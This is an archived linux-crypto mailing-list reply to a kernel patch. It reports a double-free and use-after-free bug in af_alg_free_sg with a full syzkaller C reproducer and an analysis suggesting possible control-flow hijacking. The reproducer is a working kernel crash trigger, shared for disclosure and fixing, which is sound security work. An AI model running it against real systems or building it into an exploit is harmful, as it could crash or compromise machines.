Received: by 2002:a05:7412:b995:b0:f9:9502:5bb8 with SMTP id it21csp6902501rdb; Tue, 2 Jan 2024 19:05:43 -0800 (PST) X-Google-Smtp-Source: AGHT+IGkEHvmPYL/NG2gbiwHatAADWv5mjRYzVqaVXB9zmnEgD490vz3efGdJj3pEF7hh/t0ZXMl X-Received: by 2002:a17:902:7841:b0:1d4:7f21:d63d with SMTP id e1-20020a170902784100b001d47f21d63dmr10124732pln.46.1704251143401; Tue, 02 Jan 2024 19:05:43 -0800 (PST) ARC-Seal: i=1; a=rsa-sha256; t=1704251143; cv=none; d=google.com; s=arc-20160816; b=WzGnq8MCvHyvfaF0libMJ0jD/mKWDL/y036TFFCWVoLSe9XRe6tVM2/XnorAlrKGT6 D/axl7o8uaXKJ/wdDIbRCHOPQqBOxyDhCPx48xI/JcciB4M9YV9st9vL5CKWN53h6duN GbSQfBqDj6tIp2v61g3lJF7j6KKNGO8SBXC2giRl9VdCUvT9k2LhlBv8Wayt/5mX12eB hB/euPh5YqZxLsNdfUZorXW4C5KoAZnkvTfT48GkaLFf8q6dyx6hUvxlql7VcZWEQSGe oJ/dwlyd8elkg/9eqsl/n/Yj1BHQ0b6vW0FREgO8R/v2Axfz/bCUCJiuTWRhAe4vMgEv UhkQ== ARC-Message-Signature: i=1; a=rsa-sha256; c=relaxed/relaxed; d=google.com; s=arc-20160816; h=content-transfer-encoding:cc:to:subject:message-id:date:from :mime-version:list-unsubscribe:list-subscribe:list-id:precedence :dkim-signature; bh=lTTGMdmW5tqRSqYab/aSD3OkEyygJdSXdIDYPelT2uo=; fh=j+bmkwqTSrCSOBD7OwPXYQcq+jO4yILy20jF/fcyHNM=; b=JBTwLeiGSksDThh4DLiqUMO/rgTx/aZLTt9b2eyidPTnoiGJDbxUe3+xHkhTlST4sP SBSVHVdd0H5MDeJ2mNrtGpbPVpuCGirCE32e/BB2ssYwxATgRMEn1qzxiTAUVvZZ7Eb3 9dro7lE+s0Vp0UweS5A4uDxUP1fSLF+iO6N21RvSkWH0FJLHW6WpuCe/iWJDuIYBWhbN BPpHQgkcsXts52/r2gWfAfP6EdIPcW/wD15kWgYgvh+qYcK25UOeqSSTQtHKlKkePT+O exP4s92FtrlYZFIMC9JEb/6TNSpTUi3RpKDGyi4rSSLSNo5ZsmMW6mQJ9RW1LH3P6SM7 xu/A== ARC-Authentication-Results: i=1; mx.google.com; dkim=pass header.i=@gmail.com header.s=20230601 header.b="YQwT/jk0"; spf=pass (google.com: domain of linux-crypto+bounces-1198-linux.lists.archive=gmail.com@vger.kernel.org designates 139.178.88.99 as permitted sender) smtp.mailfrom="linux-crypto+bounces-1198-linux.lists.archive=gmail.com@vger.kernel.org"; dmarc=pass (p=NONE sp=QUARANTINE dis=NONE) header.from=gmail.com Return-Path: Received: from sv.mirrors.kernel.org (sv.mirrors.kernel.org. [139.178.88.99]) by mx.google.com with ESMTPS id t20-20020a1709028c9400b001d4152a6177si19286499plo.112.2024.01.02.19.05.43 for (version=TLS1_3 cipher=TLS_AES_256_GCM_SHA384 bits=256/256); Tue, 02 Jan 2024 19:05:43 -0800 (PST) Received-SPF: pass (google.com: domain of linux-crypto+bounces-1198-linux.lists.archive=gmail.com@vger.kernel.org designates 139.178.88.99 as permitted sender) client-ip=139.178.88.99; Authentication-Results: mx.google.com; dkim=pass header.i=@gmail.com header.s=20230601 header.b="YQwT/jk0"; spf=pass (google.com: domain of linux-crypto+bounces-1198-linux.lists.archive=gmail.com@vger.kernel.org designates 139.178.88.99 as permitted sender) smtp.mailfrom="linux-crypto+bounces-1198-linux.lists.archive=gmail.com@vger.kernel.org"; dmarc=pass (p=NONE sp=QUARANTINE dis=NONE) header.from=gmail.com Received: from smtp.subspace.kernel.org (wormhole.subspace.kernel.org [52.25.139.140]) (using TLSv1.2 with cipher ECDHE-RSA-AES256-GCM-SHA384 (256/256 bits)) (No client certificate requested) by sv.mirrors.kernel.org (Postfix) with ESMTPS id B1054283F9D for ; Wed, 3 Jan 2024 03:05:42 +0000 (UTC) Received: from localhost.localdomain (localhost.localdomain [127.0.0.1]) by smtp.subspace.kernel.org (Postfix) with ESMTP id 84ADA171D2; Wed, 3 Jan 2024 03:05:37 +0000 (UTC) Authentication-Results: smtp.subspace.kernel.org; dkim=pass (2048-bit key) header.d=gmail.com header.i=@gmail.com header.b="YQwT/jk0" X-Original-To: linux-crypto@vger.kernel.org Received: from mail-pf1-f173.google.com (mail-pf1-f173.google.com [209.85.210.173]) (using TLSv1.2 with cipher ECDHE-RSA-AES128-GCM-SHA256 (128/128 bits)) (No client certificate requested) by smtp.subspace.kernel.org (Postfix) with ESMTPS id 12F0E171C8; Wed, 3 Jan 2024 03:05:35 +0000 (UTC) Authentication-Results: smtp.subspace.kernel.org; dmarc=pass (p=none dis=none) header.from=gmail.com Authentication-Results: smtp.subspace.kernel.org; spf=pass smtp.mailfrom=gmail.com Received: by mail-pf1-f173.google.com with SMTP id d2e1a72fcca58-6d9b51093a0so5715487b3a.0; Tue, 02 Jan 2024 19:05:35 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=20230601; t=1704251135; x=1704855935; darn=vger.kernel.org; h=content-transfer-encoding:cc:to:subject:message-id:date:from :mime-version:from:to:cc:subject:date:message-id:reply-to; bh=lTTGMdmW5tqRSqYab/aSD3OkEyygJdSXdIDYPelT2uo=; b=YQwT/jk04DaSZ45bWr6Rqu3byEaVqSWz9W/3KYqkYRGZfUQESawhLR5qx3ZqZOVNdS t+PzJH6nuxJvCqfd4Jp+yUbuqiSaGW5tbWScpZAL4jwpUtuOVbcpJxvYHQn0ehZt0isn qYzwv1x2z9CJix/vzhVCm15cFsylKdelAAss8QENAvcSq5qa75AvgfbCyizjJQgNA6pr EefMKxPwcsq3zKxnfy7XPy7hVD4Qfu4IuKHVIZY0b9Z2LfxgGvUV5BhKnX3ObZGHixJ6 e5BVG6RdITy2Lg0bdoCFjbH2jusPN1DUG4Kw+cJ3nBjOUYUgl1645iKVHeTzCP2n/x/B gRoA== X-Google-DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=1e100.net; s=20230601; t=1704251135; x=1704855935; h=content-transfer-encoding:cc:to:subject:message-id:date:from :mime-version:x-gm-message-state:from:to:cc:subject:date:message-id :reply-to; bh=lTTGMdmW5tqRSqYab/aSD3OkEyygJdSXdIDYPelT2uo=; b=hyTcRxzfsufIt7x8F9ssbjM/o4x6DKIkf0WoryWGyUFe0r4BnbFw+mVXkwGWgKJ9GL vEk4yrNsv9S7Svj8B3x+c3VjX//j6fTV0VJtb8GKGvF86WeMZ0MCjAbtws9SUM3yyJ8x sQaOoBDs3yy6faZyYntvkuFPlfslvpoUwRqC4+XFyAXMrU1DYcby01vbIvlfs27TUPm2 C0LfMp8SoPT3S/2G4ok1UxDWwUTspCjprXdgt+Ilf/mKQlOprA77uFajPmxFcOqP7IZU a/PNZTd5Ns1TX0mah29EYnFzbPpC0zo6ToNGybofd+IYH2HjtUrq9SamYSTRvLiIiIB3 3s7Q== X-Gm-Message-State: AOJu0YzSK2u6nh74G3+wFFP9gRTIj1cAX6pyNe8m359PjW3JTx8mL3Zb IFb5axKDcENSbnWY+3KXNlbfkhwaujIAM8F3/l4= X-Received: by 2002:a05:6a00:1e02:b0:6d9:9fba:5bce with SMTP id gx2-20020a056a001e0200b006d99fba5bcemr15768199pfb.9.1704251135213; Tue, 02 Jan 2024 19:05:35 -0800 (PST) Precedence: bulk X-Mailing-List: linux-crypto@vger.kernel.org List-Id: List-Subscribe: List-Unsubscribe: MIME-Version: 1.0 From: xingwei lee Date: Wed, 3 Jan 2024 11:05:24 +0800 Message-ID: Subject: Re: [PATCH] crypto: af_alg/hash: Fix uninit-value access in af_alg_free_sg() To: syoshida@redhat.com Cc: davem@davemloft.net, dhowells@redhat.com, herbert@gondor.apana.org.au, linux-crypto@vger.kernel.org, linux-kernel@vger.kernel.org Content-Type: text/plain; charset="UTF-8" Content-Transfer-Encoding: quoted-printable Hi,Shigeru and Herbert. Happy New Year anyway. I also found this bug and tried to reproduce it. My own syzkaller crashes titled "double-free in af_alg_free_sg=E2=80=9D or =E2=80=9CKASAN: use-after-free in af_alg_free_sg=E2=80=9D lead me to consid= er it maybe a security-related problem. I reproduced it with repro.c and repro.txt and also bisection to this commit: https://git.kernel.org/pub/scm/linux/kernel/git/netdev/net.git/comm= it/crypto/algif_hash.c?id=3Db6d972f6898308fbe7e693bf8d44ebfdb1cd2dc4 =3D* repro.c =3D* // autogenerated by syzkaller (https://github.com/google/syzkaller) #define _GNU_SOURCE #include #include #include #include #include #include #include #include uint64_t r[3] =3D {0xffffffffffffffff, 0xffffffffffffffff, 0xffffffffffffff= ff}; int main(void) { syscall(__NR_mmap, /*addr=3D*/0x1ffff000ul, /*len=3D*/0x1000ul, /*prot=3D*= /0ul, /*flags=3D*/0x32ul, /*fd=3D*/-1, /*offset=3D*/0ul); syscall(__NR_mmap, /*addr=3D*/0x20000000ul, /*len=3D*/0x1000000ul, /*prot= =3D*/7ul, /*flags=3D*/0x32ul, /*fd=3D*/-1, /*offset=3D*/0ul); syscall(__NR_mmap, /*addr=3D*/0x21000000ul, /*len=3D*/0x1000ul, /*prot=3D*= /0ul, /*flags=3D*/0x32ul, /*fd=3D*/-1, /*offset=3D*/0ul); intptr_t res =3D 0; res =3D syscall(__NR_socket, /*domain=3D*/0x26ul, /*type=3D*/5ul, /*proto= =3D*/0); if (res !=3D -1) r[0] =3D res; *(uint16_t*)0x20000040 =3D 0x26; memcpy((void*)0x20000042, "hash\000\000\000\000\000\000\000\000\000\000", = 14); *(uint32_t*)0x20000050 =3D 0; *(uint32_t*)0x20000054 =3D 0; memcpy((void*)0x20000058, "poly1305\000\000\000\000\000\000\000\000\000\000\000\000\000\000\0= 00" "\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\0= 00" "\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\000\0= 00" "\000\000\000\000\000\000\000", 64); syscall(__NR_bind, /*fd=3D*/r[0], /*addr=3D*/0x20000040ul, /*addrlen=3D*/0= x58ul); res =3D syscall(__NR_accept4, /*fd=3D*/r[0], /*peer=3D*/0ul, /*peerlen=3D*= /0ul, /*flags=3D*/0ul); if (res !=3D -1) r[1] =3D res; *(uint64_t*)0x20000d80 =3D 0; *(uint32_t*)0x20000d88 =3D 0; *(uint64_t*)0x20000d90 =3D 0x20000d40; *(uint64_t*)0x20000d40 =3D 0x20000d00; *(uint16_t*)0x20000d00 =3D 0; *(uint64_t*)0x20000d48 =3D 0x14; *(uint64_t*)0x20000d98 =3D 1; *(uint64_t*)0x20000da0 =3D 0; *(uint64_t*)0x20000da8 =3D 0; *(uint32_t*)0x20000db0 =3D 0; syscall(__NR_sendmsg, /*fd=3D*/r[1], /*msg=3D*/0x20000d80ul, /*f=3D*/0x400= c000ul); res =3D syscall(__NR_accept4, /*fd=3D*/r[1], /*peer=3D*/0ul, /*peerlen=3D*= /0ul, /*flags=3D*/0ul); if (res !=3D -1) r[2] =3D res; *(uint64_t*)0x20000840 =3D 0; *(uint32_t*)0x20000848 =3D 0; *(uint64_t*)0x20000850 =3D 0; *(uint64_t*)0x20000858 =3D 0; *(uint64_t*)0x20000860 =3D 0; *(uint64_t*)0x20000868 =3D 0; *(uint32_t*)0x20000870 =3D 0x4000; syscall(__NR_sendmsg, /*fd=3D*/r[2], /*msg=3D*/0x20000840ul, /*f=3D*/0x400= 1ul); return 0; } =3D* repro.txt =3D* r0 =3D socket$alg(0x26, 0x5, 0x0) bind$alg(r0, &(0x7f0000000040)=3D{0x26, 'hash\x00', 0x0, 0x0, 'poly1305\x00'}, 0x58) r1 =3D accept4(r0, 0x0, 0x0, 0x0) sendmsg$BATADV_CMD_SET_HARDIF(r1, &(0x7f0000000d80)=3D{0x0, 0x0, &(0x7f0000000d40)=3D{&(0x7f0000000d00)=3DANY=3D[@ANYBLOB, @ANYRES16=3D0x0, @ANYBLOB], 0x14}}, 0x400c000) r2 =3D accept4(r1, 0x0, 0x0, 0x0) sendmsg$alg(r2, &(0x7f0000000840)=3D{0x0, 0x0, 0x0, 0x0, 0x0, 0x0, 0x4000}, 0x4001) After analysing the uninitialized of ctx->sgl, it may cause (without KMSAN in linux kernel) void af_alg_free_sg(struct af_alg_sgl *sgl) { int i; if (sgl->sgt.sgl) { if (sgl->need_unpin) for (i =3D 0; i < sgl->sgt.nents; i++) unpin_user_page(sg_page(&sgl->sgt.sgl[i])); if (sgl->sgt.sgl !=3D sgl->sgl) kvfree(sgl->sgt.sgl); sgl->sgt.sgl =3D NULL; } } 1. If sgl->sgt.sgl is 0x0, the poc triggers nothing 2. If sgl->sgt.sgl is not null but like 0xbbbbbbbbbbbbbbbb, unpin_user_page will crash like =E2=80=9Cwild-memory access=E2=80=9D. 3. If sgl->sgt.sgl happens to be a pointer whether it is being used or released, sgl->sgt.nents<0, kvfree can definitely cause uaf or double free and maybe lead to control flow hijacking. The incorrect logic of unlock_free label can really cause security issues. I hope the reproducer and analysis helps. Best regards. xingwei Lee